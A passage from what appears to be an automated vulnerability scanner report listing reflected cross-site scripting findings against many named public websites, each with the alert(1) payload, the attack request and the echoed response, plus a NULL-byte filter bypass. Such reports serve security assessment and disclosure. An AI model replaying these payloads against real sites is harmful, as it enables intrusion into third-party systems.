Path:	/catered-search.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3f38"><script>alert(1)</script>a2ac421e162 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /catered-search.htm?e3f38"><script>alert(1)</script>a2ac421e162=1 HTTP/1.1
Host: www.skiamis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:38:32 GMT
Server: Apache
Set-Cookie: PHPSESSID=9ce535a0444e5bdd797d265178a6e587; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 34407

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<script type="
...[SNIP]...
<form action="/catered-search.htm?e3f38"><script>alert(1)</script>a2ac421e162=1&" method="get" id="frm_quick_search">
...[SNIP]...

3.116. http://www.slashfood.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.slashfood.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fa65"><script>alert(1)</script>553d4947f9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5fa65"><script>alert(1)</script>553d4947f9f=1 HTTP/1.1
Host: www.slashfood.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:38:04 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999652
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 60539

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="content-ty
...[SNIP]...
<link rel="canonical" href="http://www.slashfood.com/?5fa65"><script>alert(1)</script>553d4947f9f=1" />
...[SNIP]...

3.117. http://www.smartphonetoday.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.smartphonetoday.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 617c7--><script>alert(1)</script>a9b4df00f0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?617c7--><script>alert(1)</script>a9b4df00f0e=1 HTTP/1.1
Host: www.smartphonetoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:38:12 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Mon, 28 Feb 2011 13:39:12 GMT
Connection: close
Content-Type: text/html
Content-Length: 83830

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<TITLE>SmartPhone Today - The Complete Independent SmartPhone Information Resource </TITLE>
<META name="description" content="The Inte
...[SNIP]...
<script>alert(1)</script>a9b4df00f0e=1 -->
...[SNIP]...

3.118. http://www.spiele365.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.spiele365.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7ffe"><script>alert(1)</script>d4be2e94b49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f7ffe"><script>alert(1)</script>d4be2e94b49=1 HTTP/1.1
Host: www.spiele365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:38:13 GMT
Server: Apache/2.2.10 (Linux/SUSE)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=qdgrtcbcd31em2bbrdjhaiae9kdgqln7; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 24236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<input type="hidden" name="return" value="/?f7ffe"><script>alert(1)</script>d4be2e94b49=1" />
...[SNIP]...

3.119. http://www.sportspickle.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sportspickle.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53bd0"-alert(1)-"c72d172abf7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?53bd0"-alert(1)-"c72d172abf7=1 HTTP/1.1
Host: www.sportspickle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.2
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: jument_hash=deleted; expires=Sun, 28-Feb-2010 13:37:17 GMT; path=/; domain=sportspickle.com
Set-Cookie: jument_hash=5901b0c09c4bf54a95b4b12c3fffe946777c8aac; expires=Sun, 28-Feb-2016 18:41:08 GMT; path=/; domain=sportspickle.com
Set-Cookie: jument_hash=5901b0c09c4bf54a95b4b12c3fffe946777c8aac; expires=Sun, 28-Feb-2016 18:41:08 GMT; path=/; domain=sportspickle.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd" xmlns:fb="http://www.facebook.com/2008/fbml">
<html xmlns="http://www.w3.org/1999/xhtml" x
...[SNIP]...
d_site = "5480.iac.sportspickle";
jument.cookie.domain = "sportspickle.com";
jument.home_url = "http://www.sportspickle.com";
jument.this_url = "http://www.sportspickle.com/?53bd0"-alert(1)-"c72d172abf7=1";
jument.user_id = 0;
</script>
...[SNIP]...

3.120. http://www.surf-forecast.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.surf-forecast.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d17b"><script>alert(1)</script>57409e08fbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4d17b"><script>alert(1)</script>57409e08fbc=1 HTTP/1.1
Host: www.surf-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 28 Feb 2011 13:38:51 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "8ac6fe53e128f1ccb2b3b4e8f394af59"
X-Runtime: 519
Content-Length: 40974
Set-Cookie: _surf-forecast.com_session=BAh7BzoPc2Vzc2lvbl9pZCIlZGNlOWRkM2IzYTRkNDk5ZTBiOTU1ZmFjYjA0YzdjMDQ6EF9jc3JmX3Rva2VuIjF6R21nWmQ3bXp1VjQrcWx4ZWs2V21sMElYaVltOXc0SGk0UElmUks1WDdnPQ%3D%3D--bdefdfcb4f93ddc239ed67e22fdd402dd9c1f26f; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="http://fr.surf-forecast.com/?4d17b"><script>alert(1)</script>57409e08fbc=1">
...[SNIP]...

3.121. http://www.thecounter.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thecounter.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6c34a--><script>alert(1)</script>1686bde097f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6c34a--><script>alert(1)</script>1686bde097f=1 HTTP/1.1
Host: www.thecounter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:39:18 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 41200

<html>
<head>
<title>TheCounter.com - The Affordable Web Site Analysis Tool</title>


<LINK REL="stylesheet" HREF="/css/text.css" TYPE="text/css">
<meta http-equiv="Content-Type" con
...[SNIP]...
<script>alert(1)</script>1686bde097f=1 -->
...[SNIP]...

3.122. http://www.thelist.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thelist.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ba2a1--><script>alert(1)</script>4b281671d11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ba2a1--><script>alert(1)</script>4b281671d11=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:39:06 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Mon, 28 Feb 2011 13:40:06 GMT
Connection: close
Content-Type: text/html
Content-Length: 43623

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is
...[SNIP]...
<script>alert(1)</script>4b281671d11=1 -->
...[SNIP]...

3.123. http://www.thesuperficial.com/sarah-shahi-worlds-sexiest-melding-pot-02-2011/0203-sarah-shahi-07 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thesuperficial.com
Path:	/sarah-shahi-worlds-sexiest-melding-pot-02-2011/0203-sarah-shahi-07

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57092"><script>alert(1)</script>9bb8ad4f141 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 57092\"><script>alert(1)</script>9bb8ad4f141 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sarah-shahi-worlds-sexiest-melding-pot-02-2011/0203-sarah-shahi-07?57092"><script>alert(1)</script>9bb8ad4f141=1 HTTP/1.1
Host: www.thesuperficial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:39:09 GMT
Server: Apache
Set-Cookie: GEOIP_COUNTRY_CODE=US; path=/; domain=www.thesuperficial.com
X-Powered-By: PHP/5.3.5
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.thesuperficial.com/xmlrpc.php
Last-Modified: Mon, 28 Feb 2011 08:39:10 -0500
Cache-Control: max-age=300, must-revalidate
X-RSID: 172.20.21.34
Keep-Alive: timeout=5, max=7
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 68367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe class="fbook-iframe" src="http://www.facebook.com/plugins/like.php?href=http://www.thesuperficial.com/sarah-shahi-worlds-sexiest-melding-pot-02-2011/0203-sarah-shahi-07?57092\"><script>alert(1)</script>9bb8ad4f141=1&layout=standard&show_faces=false&width=&action=like&font=arial&colorscheme=light&height=20" scrolling="no" frameborder="0" style="border:none; overflow:visible; width:100
...[SNIP]...

3.124. http://www.thesuperficial.com/sarah-shahi-worlds-sexiest-melding-pot-02-2011/0203-sarah-shahi-07 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thesuperficial.com
Path:	/sarah-shahi-worlds-sexiest-melding-pot-02-2011/0203-sarah-shahi-07

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce4da"><script>alert(1)</script>2b52a4edbc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ce4da\"><script>alert(1)</script>2b52a4edbc2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sarah-shahi-worlds-sexiest-melding-pot-02-2011/0203-sarah-shahi-07?ce4da"><script>alert(1)</script>2b52a4edbc2=1 HTTP/1.1
Host: www.thesuperficial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:38:59 GMT
Server: Apache
Set-Cookie: GEOIP_COUNTRY_CODE=US; path=/; domain=www.thesuperficial.com
X-Powered-By: PHP/5.3.5
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.thesuperficial.com/xmlrpc.php
Last-Modified: Mon, 28 Feb 2011 08:38:59 -0500
Cache-Control: max-age=300, must-revalidate
X-RSID: 192.168.21.79
Keep-Alive: timeout=5, max=3
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 68367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<input type="hidden" name="redirect_to" value="/sarah-shahi-worlds-sexiest-melding-pot-02-2011/0203-sarah-shahi-07?ce4da\"><script>alert(1)</script>2b52a4edbc2=1" />
...[SNIP]...

3.125. http://www.u-tokyo.ac.jp/index_e.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.u-tokyo.ac.jp
Path:	/index_e.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fefe6"><script>alert(1)</script>050ad9e4b1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index_e.html?fefe6"><script>alert(1)</script>050ad9e4b1a=1 HTTP/1.1
Host: www.u-tokyo.ac.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:38:50 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8b PHP/5.2.8
X-Powered-By: PHP/5.2.8
Connection: close
Content-Type: text/html
Content-Length: 13489

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8"
...[SNIP]...
<a href="./index_j.html?fefe6"><script>alert(1)</script>050ad9e4b1a=1">
...[SNIP]...

3.126. http://www.vbforums.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vbforums.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 865b9--><script>alert(1)</script>35578bc47d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?865b9--><script>alert(1)</script>35578bc47d=1 HTTP/1.1
Host: www.vbforums.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:39:10 GMT
Server: Apache
Set-Cookie: bblastvisit=1298900350; expires=Tue, 28-Feb-12 13:39:10 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Tue, 28-Feb-12 13:39:10 GMT; path=/
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 158096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<!-
...[SNIP]...
<script>alert(1)</script>35578bc47d=1 -->
...[SNIP]...

3.127. http://www.watchmouse.com/en/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.watchmouse.com
Path:	/en/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83de0'-alert(1)-'1dc77df686f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en83de0'-alert(1)-'1dc77df686f/ HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:39:06 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-2aca6812130e43ea77f713d17a012f8a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::::en83de0'-alert(1)-'1dc77df686f');
           var serverRef = encodeURIComponent('');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
           }
           requestParams = 'vjsRef='+jsRef
...[SNIP]...

3.128. http://www.watchmouse.com/en/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.watchmouse.com
Path:	/en/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa224'-alert(1)-'8f9e5a9810e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/?fa224'-alert(1)-'8f9e5a9810e=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:38:59 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-e5304cca9addcdac74df6dc7c9398250"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::::?fa224'-alert(1)-'8f9e5a9810e=1');
           var serverRef = encodeURIComponent('');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
           }
           requestParams = 'vjsRef='+jsR
...[SNIP]...

3.129. http://www.webmd.com/click [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.webmd.com
Path:	/click

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98685"-alert(1)-"8e8d2566d57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /click?98685"-alert(1)-"8e8d2566d57=1 HTTP/1.1
Host: www.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:39:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: brand=mywebmd; domain=.webmd.com; path=/
Set-Cookie: VisitorId=d8eaf777-26e1-4517-a6d5-6b99e834cb0f; domain=.webmd.com; expires=Sun, 28-Feb-2021 13:39:00 GMT; path=/
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript">var s_furl = "/click?98685"-alert(1)-"8e8d2566d57=1";</script>
...[SNIP]...

3.130. http://www.wi-fihotspotlist.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wi-fihotspotlist.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 819ed--><script>alert(1)</script>bc87dd2bdd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?819ed--><script>alert(1)</script>bc87dd2bdd0=1 HTTP/1.1
Host: www.wi-fihotspotlist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:38:55 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Mon, 28 Feb 2011 13:39:55 GMT
Connection: close
Content-Type: text/html
Content-Length: 59069

<html>
<head>
<title> Wi-FiHotSpotList.com, a directory of public hot spots for finding Wi-Fi
wireless Internet access network nodes</title>
<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<script>alert(1)</script>bc87dd2bdd0=1 -->
...[SNIP]...

3.131. http://www.wifesbank.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wifesbank.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65a79"-alert(1)-"d1b418a3831 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?65a79"-alert(1)-"d1b418a3831=1 HTTP/1.1
Host: www.wifesbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:39:14 GMT
Server: Apache
Set-Cookie: from=noref; expires=Tue, 01 Mar 2011 13:39:14 GMT; path=/
Set-Cookie: lfrom=noref; expires=Tue, 01 Mar 2011 13:39:14 GMT; path=/
Set-Cookie: idcheck=1298900354; expires=Tue, 01 Mar 2011 13:39:14 GMT; path=/
Set-Cookie: index_page=1; expires=Tue, 01 Mar 2011 13:39:14 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 108057

<html>
<head>
<title>Free Mature and Milf Porn Pictures at WifesBank.com</title>
<meta name="description" content="WifesBank dedicated to sexy hot women over 30+ years old galleries, free mature an
...[SNIP]...

...[SNIP]...

3.132. http://www.worldmastiffforum.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.worldmastiffforum.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbf6e"><script>alert(1)</script>c2ada053f1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?cbf6e"><script>alert(1)</script>c2ada053f1b=1 HTTP/1.1
Host: www.worldmastiffforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 28 Feb 2011 13:39:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: hascookies=1; path=/; domain=.worldmastiffforum.com;
Expires: Nov, 8 1991 00:00:01 GMT
Cache-control: no-cache
P3P: CP='NOI DSP COR NID CURa TAIi OUR BUS INT PRE'; policyref='http://www.worldmastiffforum.com/w3c/p3p.xml';
Set-Cookie: newvisit=1298900348; path=/; domain=.worldmastiffforum.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;
Set-Cookie: lastvisit=1298900348; path=/; domain=.worldmastiffforum.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;
Vary: Accept-Encoding
Content-Length: 74533

       <html >
       <head>
       <link rel="alternate" type="application/rss+xml" title="Message Board RSS Feed" href="/external">

           <link rel="alternate" type="application/rss+xml" title="Message Board - -
...[SNIP]...
<input type="hidden" name="jump" value="http://www.worldmastiffforum.com/?cbf6e"><script>alert(1)</script>c2ada053f1b=1">
...[SNIP]...

3.133. http://www.wovencube.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wovencube.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload %008d084'><script>alert(1)</script>e4f76638384 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d084'><script>alert(1)</script>e4f76638384 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /?%008d084'><script>alert(1)</script>e4f76638384=1 HTTP/1.1
Host: www.wovencube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 28 Feb 2011 13:39:04 GMT
